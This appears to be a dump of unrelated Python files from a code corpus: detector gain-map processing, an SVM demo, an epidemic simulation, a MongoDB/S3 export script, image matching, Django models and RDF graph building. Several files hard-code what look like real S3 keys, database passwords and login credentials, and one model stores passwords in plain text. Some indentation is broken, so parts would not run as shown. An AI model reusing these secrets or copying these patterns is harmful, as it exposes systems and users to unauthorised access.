      despite the nanoseconds() accessor name — confirm intent."""
      def __init__(self):
        now = time.time()
        whole = int(math.floor(now))
        self.s = whole
        self.n = int(round((now - whole) * 1000))
      def seconds(self):
        return self.s
      def nanoseconds(self):
        return self.n
    return fakeTime()
def run(args):
  """Build a CSPAD gain-map image pickle from a raw gain file.

  Parses CLI options, loads the raw data (.npy for 2x2 detectors; .txt/.gain
  for full CSPADs), inverts the nonzero gain values, normalizes them to mean
  1, and dumps the result via cspad_tbx.dpack/easy_pickle.
  """
  command_line = (option_parser()
                  .option("-o", "--output_filename",
                          action="store",
                          type="string",
                          help="Filename for the output pickle file",
                          default="gain_map.pickle")
                  .option("-f", "--detector_format_version",
                          action="store",
                          type="string",
                          help="Detector format version to use for generating active areas and laying out tiles",
                          default=None)
                  .option("-m", "--optical_metrology_path",
                          action="store",
                          type="string",
                          help="Path to slac optical metrology file. If not set, use Run 4 metrology",
                          default=None)
                  .option("-d", "--distance",
                          action="store",
                          type="int",
                          help="Detector distance put into the gain pickle file. Not needed for processing.",
                          default="0")
                  .option("-w", "--wavelength",
                          action="store",
                          type="float",
                          help="Incident beam wavelength put into the gain pickle file. Not needed for processing.",
                          default="0")
                  ).process(args=args)
  output_filename = command_line.options.output_filename
  detector_format_version = command_line.options.detector_format_version
  # XPP detectors get an explicit beam center (1765x1765 px, 0.11 mm pitch).
  if detector_format_version is None or 'XPP' not in detector_format_version:
    beam_center_x = None
    beam_center_y = None
  else:
    beam_center_x = 1765 // 2 * 0.11
    beam_center_y = 1765 // 2 * 0.11
  address, timestamp = address_and_timestamp_from_detector_format_version(detector_format_version)
  # if no detector format version is provided, make sure to write no address to the image pickle
  # but CsPadDetector (called later), needs an address, so give it a fake one
  save_address = address is not None
  if not save_address:
    address = "CxiDs1-0|Cspad-0" # time stamp will still be None
  timestamp = evt_timestamp((timestamp,0))
  args = command_line.args
  assert len(args) == 1
  # NOTE(review): if the input file is neither .npy nor .txt/.gain, `det` is
  # never bound and the code below raises NameError — confirm intended.
  if args[0].endswith('.npy'):
    data = numpy.load(args[0])
    det, active_areas = convert_2x2(data, detector_format_version, address)
  elif args[0].endswith('.txt') or args[0].endswith('.gain'):
    raw_data = numpy.loadtxt(args[0])
    assert raw_data.shape in [(5920, 388), (11840, 194)]
    det, active_areas = convert_detector(raw_data, detector_format_version, address, command_line.options.optical_metrology_path)
  # Invert the nonzero gains and normalize to mean 1 over the selected pixels.
  img_diff = det
  img_sel = (img_diff > 0).as_1d()
  gain_map = flex.double(img_diff.accessor(), 0)
  gain_map.as_1d().set_selected(img_sel.iselection(), 1/img_diff.as_1d().select(img_sel))
  gain_map /= flex.mean(gain_map.as_1d().select(img_sel))
  if not save_address:
    address = None
  d = cspad_tbx.dpack(data=gain_map, address=address, active_areas=active_areas, timestamp=timestamp,
                      distance=command_line.options.distance,wavelength=command_line.options.wavelength,
                      beam_center_x = beam_center_x, beam_center_y = beam_center_y)
  easy_pickle.dump(output_filename, d)
def convert_detector(raw_data, detector_format_version, address, optical_metrology_path=None):
  """Assemble a raw full-CSPAD gain array into a laid-out detector image.

  Handles two raw layouts: (5920, 388) — ASICs stacked in pairs per 2x2 —
  and the (11840, 194) layout, where ASIC halves are concatenated side by
  side.  XPP format versions use tabulated active areas/rotations instead
  of optical metrology.  Returns (detector_image, active_areas), where
  active_areas may be None.
  """
  # https://confluence.slac.stanford.edu/display/PCDS/CSPad+metrology+and+calibration+files%2C+links
  data3d = []
  if raw_data.shape == (5920,388):
    asic_start = 0
    if optical_metrology_path is None:
      # Fall back to the bundled Run 4 metrology.
      calib_dir = libtbx.env.find_in_repositories("xfel/metrology/CSPad/run4/CxiDs1.0_Cspad.0")
      sections = parse_calib.calib2sections(calib_dir)
    else:
      sections = parse_calib.calib2sections(optical_metrology_path)
    for i_quad in range(4):
      asic_size = 185 * 388
      section_size = asic_size * 2
      # NOTE(review): quad_start is computed but never used.
      quad_start = i_quad * section_size * 4
      quad_asics = []
      for i_2x2 in range(4):
        for i_asic in range(2):
          # Each ASIC is 185 rows tall; slice them off sequentially.
          asic_end = asic_start + 185
          quad_asics.append(raw_data[asic_start:asic_end, :])
          asic_start = asic_end
      quad_data = numpy.dstack(quad_asics)
      quad_data = numpy.rollaxis(quad_data, 2,0)
      data3d.append(fake_cspad_ElementV2(quad_data, i_quad))
    env = fake_env(fake_config())
    evt = fake_evt(data3d)
    return flex.double(cspad_tbx.CsPadDetector(address, evt, env, sections).astype(numpy.float64)), None
  else:
    asic_start = 0
    if detector_format_version is not None and 'XPP' in detector_format_version:
      # XPP: paste each of the 64 ASIC strips into a 1765x1765 canvas using
      # the tabulated per-tile rotations and positions.
      from xfel.cxi.cspad_ana.cspad_tbx import xpp_active_areas
      rotations = xpp_active_areas[detector_format_version]['rotations']
      active_areas = xpp_active_areas[detector_format_version]['active_areas']
      det = flex.double([0]*(1765*1765))
      det.reshape(flex.grid((1765,1765)))
      for i in range(64):
        row = active_areas[i*4]
        col = active_areas[i*4 + 1]
        block = flex.double(raw_data[i * 185:(i+1)*185, :])
        det.matrix_paste_block_in_place(block.matrix_rot90(rotations[i]), row, col)
      return det, active_areas
    else:
      if optical_metrology_path is None:
        calib_dir = libtbx.env.find_in_repositories("xfel/metrology/CSPad/run4/CxiDs1.0_Cspad.0")
        sections = parse_calib.calib2sections(calib_dir)
      else:
        sections = parse_calib.calib2sections(optical_metrology_path)
      for i_quad in range(4):
        asic_size = 185 * 194
        section_size = asic_size * 4
        # NOTE(review): quad_start is computed but never used.
        quad_start = i_quad * section_size * 4
        quad_asics = []
        for i_2x2 in range(4):
          for i_asic in range(2):
            # Two 185-row halves per ASIC, re-joined side by side.
            asic_end = asic_start + 185
            a = raw_data[asic_start:asic_end, :]
            asic_start = asic_end
            asic_end = asic_start + 185
            b = raw_data[asic_start:asic_end, :]
            asic_start = asic_end
            quad_asics.append(numpy.concatenate((a,b),axis=1))
        quad_data = numpy.dstack(quad_asics)
        quad_data = numpy.rollaxis(quad_data, 2,0)
        data3d.append(fake_cspad_ElementV2(quad_data, i_quad))
      env = fake_env(fake_config())
      evt = fake_evt(data3d)
      # NOTE(review): beam_center is computed but never used.
      beam_center, active_areas = cspad_tbx.cbcaa(fake_config(),sections)
      return flex.double(cspad_tbx.CsPadDetector(address, evt, env, sections).astype(numpy.float64)), active_areas
def convert_2x2(data, detector_format_version=None, address=None):
  """Convert a raw Cspad2x2 array into an assembled CsPad2x2Image.

  Accepts data shaped (2, 185, 388) or (370, 388); both are rearranged to
  (185, 388, 2) before assembly.  The extra arguments mirror
  convert_detector's signature — run() passes them — and are currently
  unused (they default to None for backward compatibility).

  Returns:
      (image, active_areas): the assembled image and None, matching the
      (det, active_areas) pair convert_detector returns.  Bug fix: run()
      unpacks two values, but the original returned only the image.

  Raises:
      RuntimeError: if data has an unrecognized shape.
  """
  config = fake_config()
  sections = [[parse_calib.Section(90, (185 / 2 + 0, (2 * 194 + 3) / 2)),
               parse_calib.Section(90, (185 / 2 + 185, (2 * 194 + 3) / 2))]]
  if data.shape == (2, 185, 388):
    data = numpy.rollaxis(data, 0, 3)
  elif data.shape == (370, 388):
    data = numpy.dstack((data[:185, :], data[185:, :]))
  else:
    # Bug fix: the original message contained a %s placeholder but never
    # applied the % formatting, so the shape was never reported.
    raise RuntimeError(
      "Shape of numpy array is %s: I don't know what to do with an array this shape!" % (data.shape,))
  return cspad_tbx.CsPad2x2Image(data, config, sections), None
if __name__ == '__main__':
run(sys.argv[1:])
|
998,373 | ff508dc8f26ab0bd0849df1743474e542393daa8 | from sklearn import datasets
from sklearn import svm
import sklearn
# Train and evaluate an SVM classifier on the breast-cancer dataset.
# Bug fix: the original accessed sklearn.model_selection / sklearn.metrics as
# attributes of the bare `sklearn` package without importing the submodules —
# that only works if some other import pulled them in as a side effect.
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score

cancer = datasets.load_breast_cancer()
x = cancer.data
y = cancer.target
# Hold out 20% of the samples for evaluation.
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)
clf = svm.SVC()
# Training the model.
clf.fit(x_train, y_train)
# Predicting the test set.
y_pred = clf.predict(x_test)
print(y_pred)
# Accuracy score.
acc = accuracy_score(y_test, y_pred)
print(acc)
998,374 | b74ff037d97f43378fddd3fd297fd991eb1836d5 | """
This file contains all of the relevant classes etc. for diseases, including their symptoms, method of transmission, rate of transmission, etc.
"""
from SINUtil import *
class Disease:
import PersonState as ps
DISEASE_ID_COUNTER = 0
	def __init__(self,name:str,calculate_R_0=False):
		"""Create a disease named *name*; all parameters default to the null
		disease that cannot infect, sicken, or kill anyone.  Callers are
		expected to overwrite the rate/modifier attributes after creation.
		"""
		self.name = name
		self.calculate_R_0 = calculate_R_0
		#defaults describe the null disease that can't actually do anything
		self.infectivity = {'idle':0.,
							'sleep':0.,
							'traveling':0.,
							'talking':0.,
							'intimate':0.}#per time step of doing this interaction with someone infected (in the case of idle, traveling, and sleep, in the same room), what is the probability they infect me, per infected person nearby?
		# Every activity type must have an infectivity entry.
		for action_type in self.ps.ACTIVITY_TYPES:
			assert(action_type in self.infectivity)
		self.hand_wash_coef = 0.#how much does washing hands affect this disease? lower numbers means it affects this less
		self.symptom_show_rate = 0.#per day, what is the probability a person infected with this disease goes from infectious but without symptoms to infectious but with symptoms?
		self.symptom_infectivity_modifier = 0.#given that the infected person is showing symptoms, how does the infectivity change? (usually goes up)
		self.recovery_rate = 0.#per day, what is the probability I recover (go from the IS state to the R state)?
		self.die_probability = 0.#per day, what is the probability I die (from the IS state to the D state), given that the healthiness check failed?
		self.state_infectability_modifiers = {'S':0.,#this is usually 0
											'II':0.,
											'VII':0.,
											'IS':0.,
											'VIS':0.,
											'R':0.,
											'VR':0.,
											'VS':0.,
											'VU':0,
											'D':0.,#this is useful so we can figure out which disease killed which person
											'VD':0.,
											} #given that I am, for this disease, in this state, how much more (positive) or less (negative) likely am I to be infected with something else?
		self.vaccination_effectiveness = 0. #how effective is the vaccine? (probability it actually makes you nonsusceptible
		self.vaccination_rate = 0. #what is the probability any given person is vaccinated against this disease?
		self.symptom_health_effect = 0. #to what extent does this disease hurt the healthiness of the individual? (for the cold, it's not too bad, for zika, this would be debilitating (high))
		self.treatability = 0. #how much can doctors in the hospital actually help if we're infected with this?
		# Every disease state must have a modifier entry.
		for infection_state in DISEASE_STATES:
			assert(infection_state in self.state_infectability_modifiers)
		# Unique id assigned from the class-level counter.
		self.disease_id = Disease.DISEASE_ID_COUNTER
		Disease.DISEASE_ID_COUNTER += 1
		self.num_infected_by = {} #how many people has a given person infected
def __repr__(self):
return "Disease " + str(self.disease_id) + ": " + self.name
	def recover(self,person:ps.Person):
		"""Bernoulli trial: does *person* recover from this disease today?

		Being in a hospital adds HOSPITAL_TREATMENT_EFFECT * treatability to
		the base recovery rate (capped at 1).
		"""
		is_in_hopsital = person.currentLocation.loc_type == 'hospital'
		hospital_effect = 0.
		if is_in_hopsital:
			hospital_effect = HOSPITAL_TREATMENT_EFFECT * self.treatability
		return coinflip(min(self.recovery_rate + hospital_effect,1.))
	def symptom_show(self):
		"""Bernoulli trial: do symptoms appear today (at symptom_show_rate)?"""
		return coinflip(self.symptom_show_rate)
def die(self,person:ps.Person):
if coinflip(1 - person.get_effective_healthiness()):#healthier means this is less likely to happen
is_in_hopsital = person.currentLocation.loc_type == 'hospital'
hospital_effect = 0.
if is_in_hopsital:
hospital_effect = HOSPITAL_TREATMENT_EFFECT * self.treatability
return coinflip(max(0,self.die_probability - hospital_effect))#hospitals make it *less* likely that you'll die
def decide_is_vaccinated(self,person:ps.Person):
#TODO: antivax clustering here?
return coinflip(self.vaccination_rate)
def disease_state_transition(self,person:ps.Person):
if (person.disease_state[self] == 'II') and (self.symptom_show()):
person.disease_state[self] = 'IS'
elif (person.disease_state[self] == 'VII') and (self.symptom_show()):
person.disease_state[self] = 'VIS'
elif (person.disease_state[self] == 'IS') and (self.recover(person)):
person.disease_state[self] = 'R'
elif (person.disease_state[self] == 'VIS') and (self.recover(person)):
person.disease_state[self] = 'VR'
elif (person.disease_state[self] == 'IS') and (self.die(person)):
person.disease_state[self] = 'D'
person.die() #F
elif (person.disease_state[self] == 'VIS') and (self.die(person)):
person.disease_state[self] = 'VD'
person.die() #F
#set the diseases showing symptoms variable
for disease in person.disease_state:
if person.disease_state[disease] in DISEASE_STATES_SYMPTOMATIC:
person.diseasesShowingSymptoms = True
return
person.diseasesShowingSymptoms = False
"""
Does person a infect person b?
"""
def infects(self,a : ps.Person,b : ps.Person):
if a.disease_state[self] not in DISEASE_STATES_INFECTIOUS:#all diseases should be accounted for in every person's disease_state map, so we don't need to check
#a is not infectious
return False
if b.disease_state[self] not in DISEASE_STATES_SUSCEPTIBLE:
#b is not susceptible
return False
symptom_effect = self.symptom_infectivity_modifier if (a.disease_state[self] in DISEASE_STATES_SYMPTOMATIC) else 0.
hand_wash_effect = 0.
effective_activity_type = a.currentActivity.activity_type #doesn't matter if they're not talking TO b
if (a.currentActivity.activity_type == 'talking') or (a.currentActivity.activity_type == 'intimate'):
if a.currentActivity.to == b:
a_washed_hands = int(coinflip(a.hygiene_coef))
b_washed_hands = int(coinflip(b.hygiene_coef))
hand_wash_effect = self.hand_wash_coef*HANDWASH_EFFECT_MODIFIERS[a_washed_hands][b_washed_hands]#the items in HANDWASH_EFFECT_MODIFIERS are all nonpositive, so this can only hurt the disease
else:
effective_activity_type = 'idle'
intimate_effect = 0.
if a.currentActivity.activity_type == 'intimate':
if a.currentActivity.to == b:
intimate_effect = INTIMATE_EFFECT_MODIFIER#this is in general, not specific to the disease
else:
effective_activity_type = 'idle'
#logic for symbiotic and competitive diseases (e.g. having HIV makes it easier for you to get other diseases)d
net_symbio_effect = 0.
for disease in b.disease_state:
if disease != self:
net_symbio_effect += disease.state_infectability_modifiers[b.disease_state[disease]]
infectivity = self.infectivity[effective_activity_type] + symptom_effect + hand_wash_effect + intimate_effect + net_symbio_effect
res = coinflip(infectivity)
if res:
if self.calculate_R_0:
# now update our R_0 measure
if a in self.num_infected_by:
self.num_infected_by[a] += 1
else:
self.num_infected_by.update({a:1})
return True
else:
return False
'''
actually infect this person with this disease
'''
def infect(self,person:ps.Person):
if person.disease_state[self] not in DISEASE_STATES_SUSCEPTIBLE:
return#already done
if person.disease_state[self] in DISEASE_STATES_VACCINATED:
person.disease_state[self] = 'VII'
else:
person.disease_state[self] = 'II'
#this part contains some definitions for a few interesting diseases
#something of an HIV-like STD: very hard to catch casually, mostly intimate contact
STD_0 = Disease('STD_0')
STD_0.infectivity = {'idle':0.,
                     'sleep':0.,
                     'traveling':0.,
                     'talking':0.00000001,
                     'intimate':0.09}
STD_0.hand_wash_coef = 0.
STD_0.symptom_show_rate = 0.05
STD_0.symptom_infectivity_modifier = 0.05
STD_0.recovery_rate = 0.01
STD_0.die_probability = 0.001 #this doesn't actually kill you
#positive modifiers: carrying STD_0 makes other infections *more* likely (symbiotic)
STD_0.state_infectability_modifiers = {'S':0.,
                                       'II':0.1,
                                       'VII':0.1,
                                       'IS':0.15,
                                       'VIS':0.15,
                                       'R':0.05,
                                       'VR':0.05,
                                       'VS':0.,
                                       'VU':0.,
                                       'D':0.,
                                       'VD':0.,
                                       }
STD_0.vaccination_effectiveness = 0.
STD_0.vaccination_rate = 0.#there isn't one
STD_0.symptom_health_effect = 0.05#small effect
STD_0.treatability = 0.#can't be treated
#flu-like (R_0 = 2.25)
virus_0 = Disease('virus 0')
virus_0.infectivity = {'idle':0.0005,
                       'sleep':0.0001,
                       'traveling':0.0001,
                       'talking':0.009,
                       'intimate':0.06}
virus_0.hand_wash_coef = 0.5
virus_0.symptom_show_rate = 0.3
virus_0.recovery_rate = 0.2
virus_0.die_probability = 0.009
virus_0.vaccination_effectiveness = 0.3
virus_0.vaccination_rate = 0.2
virus_0.symptom_health_effect = 0.2#medium effect
virus_0.treatability = 0.4
virus_0.symptom_infectivity_modifier = 0.05
#measles-like, some numbers from https://en.wikipedia.org/wiki/Measles
virus_1 = Disease('virus 1')
virus_1.infectivity = { 'idle':0.005,
                        'sleep':0.01,
                        'traveling':0.005,
                        'talking':0.1,
                        'intimate':0.09}
virus_1.hand_wash_coef = 0.2
virus_1.symptom_show_rate = 1./14.
virus_1.recovery_rate = 0.09
virus_1.die_probability = 0.1
virus_1.vaccination_effectiveness = 0.99
virus_1.vaccination_rate = 0.95
virus_1.symptom_health_effect = 0.6#large effect
virus_1.treatability = 0.05
virus_1.symptom_infectivity_modifier = 0.03
#entirely made up, but potentially interesting: competitive disease
#(negative modifiers: having this makes catching other diseases *less* likely)
competitive_disease_0 = Disease("Competitive 0")
competitive_disease_0.infectivity = {'idle':0.,
                                     'sleep':0.0075,
                                     'traveling':0.,
                                     'talking':0.005,
                                     'intimate':0.035}
competitive_disease_0.hand_wash_coef = 0.7
competitive_disease_0.symptom_show_rate = 0.1
competitive_disease_0.symptom_infectivity_modifier = 0.09
competitive_disease_0.recovery_rate = 0.2
competitive_disease_0.die_probability = 0.001
competitive_disease_0.state_infectability_modifiers = {'S':0.,
                                                       'II':-0.2,
                                                       'VII':-0.2,
                                                       'IS':-0.3,
                                                       'VIS':-0.3,
                                                       'R':-0.05,
                                                       'VR':-0.05,
                                                       'VS':0.,
                                                       'VU':0.,
                                                       'D':0.,
                                                       'VD':0.,
                                                       }
competitive_disease_0.vaccination_effectiveness = 0.6
competitive_disease_0.vaccination_rate = 0.4
competitive_disease_0.symptom_health_effect = 0.35
competitive_disease_0.treatability = 0.3
#kills easily (R0 = 2.02)
deadly_0 = Disease("Deadly 0")
deadly_0.infectivity = {'idle':0.,
                        'sleep':0.0075,
                        'traveling':0.,
                        'talking':0.05,
                        'intimate':0.1}
deadly_0.hand_wash_coef = 0.1
deadly_0.symptom_show_rate = 0.1
deadly_0.symptom_infectivity_modifier = 0.09
deadly_0.recovery_rate = 0.02
deadly_0.die_probability = 0.2
deadly_0.state_infectability_modifiers = {'S':0.,
                                          'II':0.1,
                                          'VII':0.1,
                                          'IS':0.15,
                                          'VIS':0.15,
                                          'R':0.05,
                                          'VR':0.05,
                                          'VS':0.,
                                          'VU':0.,
                                          'D':0.,
                                          'VD':0.,
                                          }
deadly_0.vaccination_effectiveness = 0.85
deadly_0.vaccination_rate = 0.1
deadly_0.symptom_health_effect = 0.7
deadly_0.treatability = 0.1
#this is a test disease to make sure the logic all works as expected
#(guaranteed transmission on talking/intimate contact)
t_disease = Disease('test disease')
t_disease.infectivity = {'idle':0.,
                         'sleep':0.,
                         'traveling':0.,
                         'talking':1,
                         'intimate':1}
t_disease.hand_wash_coef = 0.
t_disease.symptom_show_rate = 0.5
t_disease.recovery_rate = 0.5
t_disease.die_probability = 0.1
t_disease.vaccination_effectiveness = 0.
t_disease.vaccination_rate = 0.5
t_disease.symptom_health_effect = 1#maximal effect (test value)
t_disease.treatability = 0.#untreatable (test value)
all_diseases = [STD_0,virus_0,virus_1,competitive_disease_0,deadly_0] #all diseases yet defined
real_basis_diseases = [STD_0,virus_0,virus_1] #just the ones that have basis in real ones
fast_diseases = [virus_0,virus_1,competitive_disease_0,deadly_0] #just the ones with high recovery/death rates
test_diseases = [t_disease]
998,375 | 189ffff3544e2e537c978e977b05cbb8ea04f03b | from MeteorClient import MeteorClient
from misc import g_host_address
import ejson
# Disable escaping any ejson types since we use ObjectIds everywhere
# https://www.meteor.com/ejson
ejson.EJSON_KEYWORDS = ()
client = None
callback_function = None
def connect():
    """Create the module-level MeteorClient and open the websocket (idempotent)."""
    global client
    if client:
        return  # already connected once; reuse the existing client
    client = MeteorClient('ws://%s:3000/websocket' % g_host_address)
    client.on('logged_in', logged_in) # will be called after re-connecting too!
    client.connect()
def login_callback(error, _=None):
    """Handle the result of client.login (also reused for 'logged_in' events).

    On failure prints the server's error message; on success fires the
    one-shot callback queued by ddp_call (if any), then clears it.
    """
    if error:
        print error['message']
    else:
        if __debug__:
            print 'Logged in to meteor'
        global callback_function
        if callback_function:
            callback_function()
            callback_function = None
def logged_in(data):
    """'logged_in' event handler: treat a (re)login event like a successful login."""
    login_callback(None, data)
def ddp_call(cb):
    """Queue *cb* to run once logged in, then start a (re)login."""
    # We have to create a call to login even if already logged in because
    # the connection would have broken.
    global callback_function
    callback_function = cb
    # SECURITY NOTE(review): credentials are hard-coded here; move to config/env.
    client.login('admin@infoworks.io', '123456', callback=login_callback)
|
998,376 | b900e100f8823f86986ca1ecf016d6e21bfd9fb7 | from time import time, ctime, localtime
# Showcase the three main clock views: raw epoch seconds, ctime strings,
# and the struct_time record, then a hand-formatted date and time.
epoch = time()
print()
print(f"epoch seconds: {epoch}")
print()
et = ctime(epoch)
print(f"Epoch Date and Time: {et}")
print()
ct = ctime()
print(f"Current Date and Time: {ctime()}")
print()
stobj = localtime()
print(f"struct_time Object: {stobj}")
print()
print(f"Year: {stobj.tm_year}")
print(f"Month: {stobj.tm_mon}")
print(f"Date: {stobj.tm_mday}")
print(f"Hour: {stobj.tm_hour}")
print(f"Minute: {stobj.tm_min}")
print(f"Second: {stobj.tm_sec}")
print()
print(f"{stobj.tm_mday}/{stobj.tm_mon}/{stobj.tm_year}")
print(f"{stobj.tm_hour}:{stobj.tm_min}:{stobj.tm_sec}")
print()
998,377 | 73406afa0a2d65bed230a77652fa2914fd5bf84d | import os
import pprint
import pymongo
import sys
import boto3
# Build an S3 client against a custom (non-AWS) endpoint.
# SECURITY NOTE(review): access key and secret are hard-coded in source;
# they should be moved to environment variables or an AWS credentials file.
session = boto3.session.Session()
s3 = session.client(endpoint_url='http://s3.momenta.works', aws_access_key_id='ZXIBS6QZ6J4VA0FBDNCS',
                    aws_secret_access_key='F4iCPNSGGCV7AglUc7s5TsSgns1hjZ9LAOKPoFBr', service_name='s3')
def get_db():
    """Connect to the 'dora' MongoDB database and return its handle.

    Terminates the whole process via exit() if the connection fails.
    """
    # SECURITY NOTE(review): database credentials are hard-coded in source;
    # move them to configuration or environment variables.
    SETTINGS = {
        'host': 'mumbai.momenta.works:8025',
        'database': 'dora',
        'username': 'research',
        'password': 'vrl1r0oLbsKht262eybX',
        'options': 'ssl=false'
    }
    try:
        conn = pymongo.MongoClient(
            "mongodb://{username}:{password}@{host}/{database}?{options}".format(**SETTINGS))
    except Exception as ex:
        print ("Error:", ex)
        exit('Failed to connect, terminating.')
    return conn.dora
# Export md5 and origin_path for every annotated document in the collection.
# NOTE: this file is Python 2 (print statements, `except Exception, e`).
db = get_db()
# collection = db['human_box_trainset_fisheye_v3']
collection = db['human_box_h3_special_v5']
print "here"
# with open('/home/fangxin/Fisheye/test_annotations/19916_Fisheye_test.md5', 'r') as fp:
#     testset_md5 = [l.strip() for l in fp.readlines()]
#
# with open('/home/fangxin/Fisheye/img_320684.md5', 'r') as fp:
#     cur_md5 = [l.strip() for l in fp.readlines()]
print "read over"
# Get md5 && Download
cnt = 0
# batch_size(1) + no_cursor_timeout keeps the server cursor alive for a long scan
demos = collection.find({},no_cursor_timeout = True).batch_size(1)
# NOTE(review): fp/fp2 are never closed and the cursor is never explicitly
# closed either -- consider `with` blocks / demos.close() in a finally.
fp = open('/home/fangxin/h3_workspace/special_img.md5', 'w')
fp2 = open('/home/fangxin/h3_workspace/special_img.list', 'w')
try:
    for item in demos:
        if item.get('result') is not None:
            if cnt % 100 == 0:
                # lightweight progress indicator on one console line
                sys.stdout.write('\rcnt={}'.format(cnt))
                sys.stdout.flush()
            md5_str = item.get('md5')
            origin_path = item.get('origin_path')
            # if md5_str in testset_md5:
            #     all_cnt += 1
            #     continue
            # if md5_str in cur_md5:
            #     all_cnt += 1
            #     continue
            cnt += 1
            # flush after every line so partial output survives a crash
            fp.write(md5_str + '\n')
            fp.flush()
            fp2.write(origin_path + '\n')
            fp2.flush()
except Exception, e:
    print e
998,378 | d1ded30cad87d3a0c2c1c466afe10284481432fa | import Adafruit_GPIO.PWM as pwmLib
from time import time, sleep
# Quick hardware smoke test for the CHIP board's PWM adapter:
# start two channels, then retune channel 5 and stop both.
#pwm = pwmLib.get_platform_pwm()
pwm = pwmLib.CHIP_PWM_Adapter()
pwm.start(5, 3, 1)   # channel 5: 3% duty cycle -- TODO confirm arg meaning against the adapter API
pwm.start(6, 15, 1)  # channel 6: 15% duty cycle
sleep(3)
pwm.set_duty_cycle(5, 12)
pwm.set_frequency(5, 0.2)
sleep(10)
pwm.stop(5);
pwm.stop(6);
|
998,379 | 8fd970c9213022baed28128b22d5f5580a5eabf7 | import cv2
import numpy as np
from requests.exceptions import HTTPError
import json
import random
import os
txtfile = open("result0.86_negative.txt","a+") #change
txtfile.write("\n" + "FRONT-FAR" +"\n") #change
path1 = r"C:\Users\Supapitch\Desktop\detect_how_similar_images_are\testset\negative\front"
path2 = r"C:\Users\Supapitch\Desktop\detect_how_similar_images_are\testset\negative\far" #change
for num in range(22):
random1 = random.choice([
x for x in os.listdir(path1)
if os.path.isfile(os.path.join(path1, x))
])
random2 = random.choice([
y for y in os.listdir(path2)
if os.path.isfile(os.path.join(path2, y))
])
random_front = random1.strip("\n")
random_other = random2.strip("\n")
stripfront = random1.strip(".jpg")
stripother = random2.strip(".jpg")
frontName = stripfront.split("_")
otherName = stripother.split("_")
# Don't forget to resize images before processing (size < 2000)
original = cv2.imread("testset/negative/front/"+random_front)
image_to_compare = cv2.imread("testset/negative/far/"+random_other) #change
# 1) Check if 2 images are equals
if original.shape == image_to_compare.shape:
print("same size and channels")
difference = cv2.subtract(original, image_to_compare)
b, g, r = cv2.split(difference)
if cv2.countNonZero(b) == 0 and cv2.countNonZero(g) == 0 and cv2.countNonZero(r) == 0:
print("same pixel value")
else:
print("different pixel value")
else:
print("different size and channels")
# 2) Check for similarities between the 2 images
sift = cv2.xfeatures2d.SIFT_create()
kp_1, desc_1 = sift.detectAndCompute(original, None)
kp_2, desc_2 = sift.detectAndCompute(image_to_compare, None)
FLANN_INDEX_KDTREE = 0
index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)
search_params = dict()
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(desc_1, desc_2, k=2)
# Need to draw only good matches, so create a mask
matchesMask = [[0,0] for i in range(len(matches))]
# ratio test as per Lowe's paper
good_points = []
for i,(m,n) in enumerate(matches):
if m.distance < 0.86*n.distance: #distance value
matchesMask[i]=[1,0]
good_points.append(m)
# Define how similar they are
number_keypoints = 0
if len(kp_1) <= len(kp_2):
number_keypoints = len(kp_1)
else:
number_keypoints = len(kp_2)
percentSimilar = (len(good_points) / number_keypoints)* 100
txtfile.write("%d. %s - %s: %d / %d / %d / %f \n" % (num+1,frontName[0],otherName[0],len(kp_1),len(kp_2),len(good_points),percentSimilar))
txtfile.close() |
998,380 | 9ca6e1d8143164952e8858b1c6ac856052df8c67 | from django.db import models
# Create your models here.
class Course(models.Model):
    """A course offering, identified by its course code."""
    # NOTE(review): a 'unique' error message is configured but the field is
    # not declared unique=True, so that message can never fire -- confirm intent.
    code = models.CharField(max_length=10,
                            blank=False,
                            help_text='课程代码',
                            error_messages={
                                'unique': "A code with that course already exists."}
                            )
    name_en = models.CharField(max_length=100, blank=True)  # English course name
    url = models.URLField()                 # course homepage
    term = models.IntegerField(null=True)   # term number within the year
    year = models.IntegerField(null=True)
    def __str__(self):
        return self.code
class Students(models.Model):
    """A registered student account."""
    # NOTE(review): 'unique' error message configured without unique=True -- confirm.
    name = models.CharField(max_length=30,
                            blank=False,
                            help_text='昵称',
                            error_messages={
                                'unique': "A user with that username already exists."}
                            )
    email = models.EmailField(blank=True)
    # SECURITY NOTE(review): password is stored as plain text; use Django's
    # auth framework / password hashing instead.
    password = models.CharField(max_length=30, blank=False)
    register_time = models.DateField(auto_now_add=True)
    def __str__(self):
        return self.name
|
998,381 | b504e027ee4c10126fd4361c55b7a630c94bfc6e | #!/usr/bin/python3
"""
Constructs the subgraph on the "方剂" (recipe) side.
Composed by Zhand Danyang @THU
Last Revision: Sep 3rd, 2019
"""
import sys
sys.path.insert(0, "../lib")
import rdflib
import json
import rdf_namespace
import utils
import itertools
# Load the four JSON databases and the keyword lists that everything below
# cross-references.  Each `database` pipeline flattens the nested JSON into
# a flat list of entries.
graph = rdflib.Graph()
with open("../database/方剂/常用中药方剂.json") as f:
    database = json.load(f)
    database = itertools.chain.from_iterable(db.values() for db in database.values())
    database = itertools.chain.from_iterable(database)
    common_chinese_drug_recipes = list(database)
    # list of dict {方剂名 (recipe name), 组成 (composition), 功用 (effect+symptom)}
with open("../database/病症/中医常见病症.json") as f:
    database = json.load(f)["常见病"]
    database = ((set(utils.extract_equivalent_expressions(k)), w["子类"]) for k, w in database.items() if "子类" in w)
    database = itertools.chain.from_iterable(
        ((k, w) for w in sub) for k, sub in database)
    chinese_medicine_common_symptoms = list(database)
    # list of (病症 symptom-name-set, dict{性质 nature, 对策 countermeasure, 给方 prescription})
with open("../database/方剂/中药配方大全.json") as f:
    database = json.load(f)
    database = itertools.chain.from_iterable(v for k, v in database.items() if k not in ["药物药性疗效表", "祖传秘方"])
    chinese_drug_recipe_encyclopaedia = list(database)
    # list of {方剂名, 组方, 适应症 (indications), 方解, 药物功效}
with open("../database/病症/中华人民共和国中医药行业标准-中医证候诊断标准16.json") as f:
    database = json.load(f)
    database = itertools.chain.from_iterable(((k, v) for v in l) for k, l in database.items())
    prc_chinese_medicine_and_drug_trade_standard_chinese_medicine_symptom_diagnosis_standard_2016 =\
        list(database)
    # list of (疾病科目 disease category, dict{病症, 病机, 诊断依据, 症候分类, 疗效评定})
# each loader returns (list of (id, [keywords]), dict keyword -> id)
recipe_keywords, recipe_keyword_mappings = utils.load_rdf_keywords_from_trivial_list("../database/方剂/方剂关键词")
